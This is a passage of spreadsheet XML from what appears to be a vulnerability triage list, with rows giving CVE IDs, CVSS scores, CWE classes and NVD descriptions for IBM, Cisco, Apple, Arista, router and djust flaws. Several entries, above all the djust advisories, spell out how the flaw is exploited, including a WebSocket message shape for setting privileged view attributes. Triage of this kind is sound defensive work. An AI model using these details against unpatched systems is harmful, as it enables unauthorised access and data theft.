          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92469</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12756</t>
        </is>
      </c>
      <c r="D726" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E726" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F726" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G726" s="5" t="inlineStr"/>
      <c r="H726" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I726" s="5" t="inlineStr"/>
      <c r="J726" s="5" t="inlineStr"/>
      <c r="K726" s="5" t="inlineStr"/>
      <c r="L726" s="5" t="inlineStr"/>
      <c r="M726" s="5" t="inlineStr"/>
      <c r="N726" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O726" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P726" s="5" t="inlineStr"/>
      <c r="Q726" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R726" s="5" t="inlineStr">
        <is>
          <t>IBM Business Automation Workflow containers and traditional is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.</t>
        </is>
      </c>
      <c r="S726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12756</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13107</t>
        </is>
      </c>
      <c r="D727" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E727" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F727" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G727" s="5" t="inlineStr"/>
      <c r="H727" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I727" s="5" t="inlineStr"/>
      <c r="J727" s="5" t="inlineStr"/>
      <c r="K727" s="5" t="inlineStr"/>
      <c r="L727" s="5" t="inlineStr"/>
      <c r="M727" s="5" t="inlineStr"/>
      <c r="N727" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O727" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P727" s="5" t="inlineStr"/>
      <c r="Q727" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R727" s="5" t="inlineStr">
        <is>
          <t>IBM Business Automation Workflow containers and traditional may use programming model artifacts that are vulnerable to XML Entity Injection attacks by default.</t>
        </is>
      </c>
      <c r="S727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13107</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13275</t>
        </is>
      </c>
      <c r="D728" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E728" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F728" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G728" s="5" t="inlineStr"/>
      <c r="H728" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I728" s="5" t="inlineStr"/>
      <c r="J728" s="5" t="inlineStr"/>
      <c r="K728" s="5" t="inlineStr"/>
      <c r="L728" s="5" t="inlineStr"/>
      <c r="M728" s="5" t="inlineStr"/>
      <c r="N728" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O728" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P728" s="5" t="inlineStr"/>
      <c r="Q728" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R728" s="5" t="inlineStr">
        <is>
          <t>IBM MQ 9.1.0.0 through 9.1.0.37 LTS, 9.2.0.0 through 9.2.0.43 LTS, 9.3.0.0 through 9.3.0.41 LTS, 9.3.0.0 through 9.3.5.1 CD, 9.4.0.0 through 9.4.0.25 LTS, 9.4.0.0 through 9.4.5.1 CD, and 10.0.0.0 Managed File Transfer could allow an authenticated attacker to read arbitrary files or perform server-side request forgery due to XML external entity injection in reply message processing.</t>
        </is>
      </c>
      <c r="S728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13275</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13285</t>
        </is>
      </c>
      <c r="D729" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E729" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F729" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G729" s="5" t="inlineStr"/>
      <c r="H729" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I729" s="5" t="inlineStr"/>
      <c r="J729" s="5" t="inlineStr"/>
      <c r="K729" s="5" t="inlineStr"/>
      <c r="L729" s="5" t="inlineStr"/>
      <c r="M729" s="5" t="inlineStr"/>
      <c r="N729" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O729" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P729" s="5" t="inlineStr"/>
      <c r="Q729" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R729" s="5" t="inlineStr">
        <is>
          <t>IBM MQ 9.1.0.0 through 9.1.0.37 LTS, 9.2.0.0 through 9.2.0.43 LTS, 9.3.0.0 through 9.3.0.41 LTS, 9.3.0.0 through 9.3.5.1 CD, 9.4.0.0 through 9.4.0.25 LTS, 9.4.0.0 through 9.4.5.1 CD, and 10.0.0.0 is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.</t>
        </is>
      </c>
      <c r="S729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13285</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13287</t>
        </is>
      </c>
      <c r="D730" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E730" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F730" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G730" s="5" t="inlineStr"/>
      <c r="H730" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I730" s="5" t="inlineStr"/>
      <c r="J730" s="5" t="inlineStr"/>
      <c r="K730" s="5" t="inlineStr"/>
      <c r="L730" s="5" t="inlineStr"/>
      <c r="M730" s="5" t="inlineStr"/>
      <c r="N730" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O730" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P730" s="5" t="inlineStr"/>
      <c r="Q730" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R730" s="5" t="inlineStr">
        <is>
          <t>IBM MQ 9.1.0.0 through 9.1.0.37 LTS, 9.2.0.0 through 9.2.0.43 LTS, 9.3.0.0 through 9.3.0.41 LTS, 9.3.0.0 through 9.3.5.1 CD, 9.4.0.0 through 9.4.0.25 LTS, 9.4.0.0 through 9.4.5.1 CD, and 10.0.0.0 is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.</t>
        </is>
      </c>
      <c r="S730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13287</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19248</t>
        </is>
      </c>
      <c r="D731" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E731" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F731" s="5" t="inlineStr">
        <is>
          <t>a59d8014-47c4-4630-ab43-e1b13cbe58e3</t>
        </is>
      </c>
      <c r="G731" s="5" t="inlineStr"/>
      <c r="H731" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I731" s="5" t="inlineStr"/>
      <c r="J731" s="5" t="inlineStr"/>
      <c r="K731" s="5" t="inlineStr"/>
      <c r="L731" s="5" t="inlineStr"/>
      <c r="M731" s="5" t="inlineStr"/>
      <c r="N731" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O731" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P731" s="5" t="inlineStr"/>
      <c r="Q731" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R731" s="5" t="inlineStr">
        <is>
          <t>QDomDocument XML parsing is vulnerable to a remotely-triggerable denial-of-service crash when processing untrusted input.</t>
        </is>
      </c>
      <c r="S731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19248</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20300</t>
        </is>
      </c>
      <c r="D732" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E732" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F732" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G732" s="5" t="inlineStr"/>
      <c r="H732" s="5" t="inlineStr"/>
      <c r="I732" s="5" t="inlineStr"/>
      <c r="J732" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K732" s="5" t="inlineStr"/>
      <c r="L732" s="5" t="inlineStr"/>
      <c r="M732" s="5" t="inlineStr"/>
      <c r="N732" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O732" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P732" s="5" t="inlineStr"/>
      <c r="Q732" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R732" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco ISE could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected device. To exploit this vulnerability, the attacker must have at least low-privileged administrative credentials.
This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to read or modify data in the underlying database.</t>
        </is>
      </c>
      <c r="S732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20300</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20683</t>
        </is>
      </c>
      <c r="D733" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E733" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F733" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G733" s="5" t="inlineStr"/>
      <c r="H733" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I733" s="5" t="inlineStr"/>
      <c r="J733" s="5" t="inlineStr"/>
      <c r="K733" s="5" t="inlineStr"/>
      <c r="L733" s="5" t="inlineStr"/>
      <c r="M733" s="5" t="inlineStr"/>
      <c r="N733" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O733" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P733" s="5" t="inlineStr"/>
      <c r="Q733" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R733" s="5" t="inlineStr">
        <is>
          <t>An authentication issue was addressed with improved state management. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, visionOS 27. An app may be able to use the Sign In With Apple authentication flow to access the user's Apple Account.</t>
        </is>
      </c>
      <c r="S733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20683</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40856</t>
        </is>
      </c>
      <c r="D734" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E734" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F734" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G734" s="5" t="inlineStr"/>
      <c r="H734" s="5" t="inlineStr"/>
      <c r="I734" s="5" t="inlineStr"/>
      <c r="J734" s="5" t="inlineStr"/>
      <c r="K734" s="5" t="inlineStr"/>
      <c r="L734" s="5" t="inlineStr"/>
      <c r="M734" s="5" t="inlineStr"/>
      <c r="N734" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O734" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P734" s="5" t="inlineStr"/>
      <c r="Q734" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R734" s="5" t="inlineStr">
        <is>
          <t>WNC T-Mobile 5G Box IDU router is vulnerable to improper access control. The vulnerability exists in the wnc_maccheck.cgi endpoint, which is accessible without authentication. It allows a remote attacker to retrieve sensitive configuration data, including the administrator web password, WiFi passphrase, and technical device information.This issue has been fixed in firmware version 1.1.0.651412</t>
        </is>
      </c>
      <c r="S734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40856</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61596</t>
        </is>
      </c>
      <c r="D735" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E735" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F735" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G735" s="5" t="inlineStr"/>
      <c r="H735" s="5" t="inlineStr"/>
      <c r="I735" s="5" t="inlineStr"/>
      <c r="J735" s="5" t="inlineStr"/>
      <c r="K735" s="5" t="inlineStr"/>
      <c r="L735" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M735" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N735" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O735" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P735" s="5" t="inlineStr"/>
      <c r="Q735" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R735" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, djust's per-object authorization (`get_object` + `has_object_permission`, ADR-017) was enforced on the WebSocket mount and event paths but not on three other render entry points: (a) the initial HTTP GET render, (b) SPA `url_change` navigation, and (c) `{% live_render %}` embedded child views. An authenticated user could therefore view (and on some paths act on) an object they are not authorized for by loading the page directly, navigating to it via SPA url-change, or composing it as an embedded child — a classic IDOR / broken object-level access control on object-scoped views. This is fixed in djust 1.0.7. All render entry points now route through a shared `enforce_object_permission` chokepoint: HTTP GET returns 403, `url_change` emits a `permission_denied` frame and skips the render, and `{% live_render %}` (eager + lazy) refuses the embed. Views without a custom `get_object` are unaffected (no-op). No reliable workaround short of upgrading. Do not expose object-scoped views through the HTTP-GET / url_change / live_render paths until patched.</t>
        </is>
      </c>
      <c r="S735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61596</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61598</t>
        </is>
      </c>
      <c r="D736" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E736" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F736" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G736" s="5" t="inlineStr"/>
      <c r="H736" s="5" t="inlineStr"/>
      <c r="I736" s="5" t="inlineStr"/>
      <c r="J736" s="5" t="inlineStr"/>
      <c r="K736" s="5" t="inlineStr"/>
      <c r="L736" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M736" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N736" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O736" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P736" s="5" t="inlineStr"/>
      <c r="Q736" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="R736" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, `djust.mixins.model_binding.ModelBindingMixin` provides a default `update_model` event handler and is part of the LiveView base MRO, so every LiveView exposes it. It `setattr`s a view attribute whose name is client-supplied (`field`), gated only by: reject `_`-prefixed names; reject a 14-entry denylist of framework internals (`FORBIDDEN_MODEL_FIELDS`); optional `allowed_model_fields` which defaults to None = allow all; and `hasattr` existence. As a result, a client can set any public, existing view attribute — not just the fields actually bound with `dj-model=` in the rendered template. The denylist covers framework plumbing but nothing about developer business/authz state, and the allowlist is opt-in (off by default). A developer who binds one `dj-model="search"` input and also keeps `self.account_id` / `self.is_admin` / `self.total_price` as view state does not realize a client can set ALL of them via `{type:event, event:"update_model", params:{field, value}}` over the WebSocket. Type coercion matches the target attribute's type (so `"true"` -&gt; bool True), aiding the attacker. This issue is fixed in djust 1.0.7. As a workaround, set `allowed_model_fields` explicitly on every view using dj-model (or subclassing LiveView) to the minimal list of bindable fields; do not keep authorization/ownership state in public view attributes that share the view with dj-model bindings.</t>
        </is>
      </c>
      <c r="S736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61598</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61915</t>
        </is>
      </c>
      <c r="D737" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E737" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F737" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G737" s="5" t="inlineStr"/>
      <c r="H737" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I737" s="5" t="inlineStr"/>
      <c r="J737" s="5" t="inlineStr"/>
      <c r="K737" s="5" t="inlineStr">
        <is>
          <t>cyrus:imap</t>
        </is>
      </c>
      <c r="L737" s="5" t="inlineStr"/>
      <c r="M737" s="5" t="inlineStr"/>
      <c r="N737" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O737" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P737" s="5" t="inlineStr"/>
      <c r="Q737" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R737" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. There is a VPATCH BYPARAM double-free. An authenticated calendar user could crash a Cyrus CalDAV worker with a PATCH containing PATCH-ACTION="BYPARAM@..." against a resource with two or more properties of the matched kind. The memory holding the selector would be freed once on each iteration over the properties.</t>
        </is>
      </c>
      <c r="S737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61915</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66305</t>
        </is>
      </c>
      <c r="D738" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E738" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F738" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G738" s="5" t="inlineStr"/>
      <c r="H738" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I738" s="5" t="inlineStr"/>
      <c r="J738" s="5" t="inlineStr"/>
      <c r="K738" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L738" s="5" t="inlineStr"/>
      <c r="M738" s="5" t="inlineStr"/>
      <c r="N738" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O738" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P738" s="5" t="inlineStr"/>
      <c r="Q738" s="5" t="inlineStr">
        <is>
          <t>CWE-603</t>
        </is>
      </c>
      <c r="R738" s="5" t="inlineStr">
        <is>
          <t>Use of client-side authentication in Skype for Business allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66305</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73175</t>
        </is>
      </c>
      <c r="D739" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E739" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F739" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G739" s="5" t="inlineStr"/>
      <c r="H739" s="5" t="inlineStr"/>
      <c r="I739" s="5" t="inlineStr"/>
      <c r="J739" s="5" t="inlineStr"/>
      <c r="K739" s="5" t="inlineStr"/>
      <c r="L739" s="5" t="inlineStr"/>
      <c r="M739" s="5" t="inlineStr"/>
      <c r="N739" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O739" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P739" s="5" t="inlineStr"/>
      <c r="Q739" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R739" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-400: Uncontrolled Resource Consumption vulnerability in the OPC UA gateway component of Advantech EKI-1242EIMS in firmware version V1.06.01 that allows an adjacent unauthenticated attacker to exhaust the server session pool and cause a complete denial of service to all legitimate OPC UA clients by opening multiple anonymous sessions.</t>
        </is>
      </c>
      <c r="S739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73175</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73462</t>
        </is>
      </c>
      <c r="D740" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E740" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F740" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G740" s="5" t="inlineStr"/>
      <c r="H740" s="5" t="inlineStr"/>
      <c r="I740" s="5" t="inlineStr"/>
      <c r="J740" s="5" t="inlineStr"/>
      <c r="K740" s="5" t="inlineStr"/>
      <c r="L740" s="5" t="inlineStr"/>
      <c r="M740" s="5" t="inlineStr"/>
      <c r="N740" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O740" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P740" s="5" t="inlineStr"/>
      <c r="Q740" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R740" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with IGMP (Internet Group Management Protocol) snooping configured (enabled by default on all VLANs), a network-adjacent unauthenticated attacker can send malformed network packets on an affected VLAN to cause the IGMP snooping agent to terminate unexpectedly. This results in a temporary disruption of multicast traffic management, which may cause multicast traffic to be flooded to all ports of the affected VLAN until the service recovers. Repeated exploitation could result in a prolonged loss of intended multicast forwarding behavior.</t>
        </is>
      </c>
      <c r="S740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73462</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73468</t>
        </is>
      </c>
      <c r="D741" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E741" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F741" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G741" s="5" t="inlineStr"/>
      <c r="H741" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I741" s="5" t="inlineStr"/>
      <c r="J741" s="5" t="inlineStr"/>
      <c r="K741" s="5" t="inlineStr"/>
      <c r="L741" s="5" t="inlineStr"/>
      <c r="M741" s="5" t="inlineStr"/>
      <c r="N741" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O741" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P741" s="5" t="inlineStr"/>
      <c r="Q741" s="5" t="inlineStr">
        <is>
          <t>CWE-670</t>
        </is>
      </c>
      <c r="R741" s="5" t="inlineStr">
        <is>
          <t>A specially crafted packet can cause the premature expiry of multicast forwarding state on affected interfaces, potentially resulting in temporary multicast traffic loss during the affected period.</t>
        </is>
      </c>
      <c r="S741" s="6" t="inlineStr">
